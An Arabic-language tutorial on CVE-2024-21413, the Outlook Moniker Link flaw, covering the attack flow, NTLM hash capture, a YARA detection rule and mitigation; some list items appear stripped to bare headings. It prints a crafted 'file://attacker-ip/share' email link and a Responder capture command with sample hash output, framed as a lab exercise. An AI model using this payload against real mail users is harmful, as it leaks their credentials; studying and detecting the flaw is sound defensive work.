
دليل تعليمي حول CVE-2024-21413، ثغرة Moniker Link في Outlook ذات النقر الصفري، يغطي مسار الهجوم، التقاط بيانات اعتماد NTLM، الكشف باستخدام YARA، واستراتيجيات التخفيف.
CVE-2024-21413، المعروفة باسم ثغرة Moniker Link، هي خلل أمني خطير في Microsoft Outlook يمكّن المهاجمين من تسريب بيانات اعتماد المستخدمين دون الحاجة إلى أي تفاعل.
على عكس هجمات التصيد التقليدية، يمكن تفعيل هذه الثغرة بمجرد معاينة رسالة بريد إلكتروني، مما يجعلها خطيرة بشكل خاص في بيئات المؤسسات.
يكمن السبب في طريقة معالجة Outlook لـ روابط moniker، مما يؤدي إلى محاولات مصادقة غير مقصودة إلى أنظمة يتحكم فيها المهاجم.
يعد فهم المفاهيم التالية أمرًا ضروريًا:
آلية خاصة بنظام Windows تسمح للتطبيقات بالإشارة إلى موارد خارجية باستخدام بروتوكولات مثل:
file://unc://\\attacker-server\share
يُستخدم للوصول إلى الموارد المشتركة عبر الشبكة. في هذه الثغرة، يُساء استخدامه لإجبار طلبات المصادقة.
تم تصميم العرض المحمي في Outlook لعزل المحتوى غير الآمن. هذه الثغرة تتجاوز تلك الحماية، مما يسمح بالوصول إلى الموارد الخارجية.
إعداد الحمولة (Payload)
file://attacker-server/share) داخل بريد إلكتروني.التسليم
التفعيل
المعالجة التلقائية
طلب المصادقة
كشف بيانات الاعتماد
[Attacker]
|
| 1. Send crafted email
v
[Victim Outlook]
|
| 2. Auto-process moniker link
v
[Windows System]
|
| 3. NTLM authentication attempt
v
[Attacker Server]
|
| 4. Capture NTLM hash
v
[Credential Abuse / Lateral Movement]
⚠️ نفّذ ذلك فقط في بيئات مختبرية خاضعة للتحكم
sudo responder -I eth0
<a href="file://attacker-ip/share">Open Document</a>
[SMB] NTLMv2 Hash captured
User: victim
تم تطوير قاعدة كشف بواسطة Florian Roth لتحديد محاولات الاستغلال التي تنطوي على روابط moniker.
rule Outlook_MonikerLink_CVE_2024_21413
{
meta:
description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
author = "Florian Roth"
reference = "CVE-2024-21413"
strings:
$a = "file://"
$b = "\\\\"
condition:
any of them
}
file:// و UNCتوضح CVE-2024-21413 كيف يمكن استغلال سلوكيات النظام المتكاملة بعمق (مثل المصادقة التلقائية) عبر مدخلات تبدو غير ضارة مثل روابط البريد الإلكتروني.
💡 توصية: أعد إنتاج هذه الثغرة في مختبر افتراضي (مثل جهاز Windows افتراضي + جهاز مهاجم افتراضي) لفهم سلسلة الهجوم والاستراتيجيات الدفاعية بشكل كامل.